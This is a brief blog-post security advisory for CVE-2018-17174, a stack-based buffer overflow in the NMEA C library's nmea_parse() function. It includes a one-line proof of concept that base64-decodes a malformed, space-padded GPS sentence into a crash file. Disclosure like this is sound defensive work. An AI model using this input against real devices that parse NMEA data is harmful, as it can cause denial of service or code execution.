Buffer Overflow in NMEA Library

OVERVIEW

PRODUCT DESCRIPTION

open source and free library in 'C' programming language for work with NMEA protocol. Small and easy to use. The library build on different compilers under different platforms (see below). The code was tested in real projects.

SUMMARY AND IMPACT

a stack-based buffer overflow was discovered in NMEA library. In nmea_parse() in parser.c , It allow an attacker to trigger denial of service (even arbitrary code execution in specified context) on a product using this library via malformed data.

CVE-2018-17174 has been assigned to this.

PROOF OF CONCEPT

echo JEdQUk1DLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAyMTM2NDAuODg2LFYsLCwsLCwsMDEwMjA3LCwsTio0RA0KCg== | base64 -d > PoC

REFERENCE

posted @ 2018-09-19 00:52  tr3e  阅读(702)  评论(0编辑  收藏  举报